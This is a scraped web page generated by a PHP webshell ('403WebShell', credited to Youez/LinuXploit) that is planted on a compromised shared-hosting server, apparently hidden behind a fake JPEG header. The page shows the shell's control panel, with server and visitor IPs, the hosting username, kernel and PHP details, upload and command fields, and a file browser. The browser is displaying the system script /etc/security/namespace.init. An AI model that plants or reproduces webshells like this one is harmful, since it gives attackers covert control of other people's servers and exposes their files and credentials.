JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 2.57.91.152  /  Your IP : 216.73.216.163
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /etc/security/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /etc/security/namespace.init
#!/usr/bin/sh
# It receives as arguments:
# - $1 polydir path (see WARNING below)
# - $2 instance path (see WARNING below)
# - $3 flag whether the instance dir was newly created (0 - no, 1 - yes)
# - $4 user name
# - $5 flag whether the polydir path ($1) is safe (0 - unsafe, 1 -safe)
# - $6 flag whether the instance path ($2) is safe (0 - unsafe, 1 - safe)
#
# WARNING: This script is invoked with full root privileges. Accessing
# the polydir ($1) and the instance ($2) directories in this context may be
# extremely dangerous as those can be under user control. The flags $5 and $6
# are provided to let you know if all the segments part of the path (except the
# last one) are owned by root and are writable by root only. If the path does
# not meet these criteria, you expose yourself to possible symlink attacks when
# accessing these path.
# However, even if the path components are safe, the content of the
# directories may still be owned/writable by a user, so care must be taken!
#
# The following section will copy the contents of /etc/skel if this is a
# newly created home directory.

# Executes only if the polydir path is safe
if [ "$5" = 1 ]; then

    if [ "$3" = 1 ]; then
            # This line will fix the labeling on all newly created directories
            [ -x /sbin/restorecon ] && /sbin/restorecon "$1"
            user="$4"
            passwd=$(getent passwd "$user")
            homedir=$(echo "$passwd" | cut -f6 -d":")
            if [ "$1" = "$homedir" ]; then
                    gid=$(echo "$passwd" | cut -f4 -d":")
                    cp -rT /etc/skel "$homedir"
                    chown -R "$user":"$gid" "$homedir"
                    mask=$(sed -E -n 's/^UMASK[[:space:]]+([^#[:space:]]+).*/\1/p' /etc/login.defs)
                    mode=$(printf "%o" $((0777 & ~mask)))
                    chmod ${mode:-700} "$homedir"
                    [ -x /sbin/restorecon ] && /sbin/restorecon -R "$homedir"
            fi
    fi
fi
exit 0

Youez - 2016 - github.com/yon3zu
LinuXploit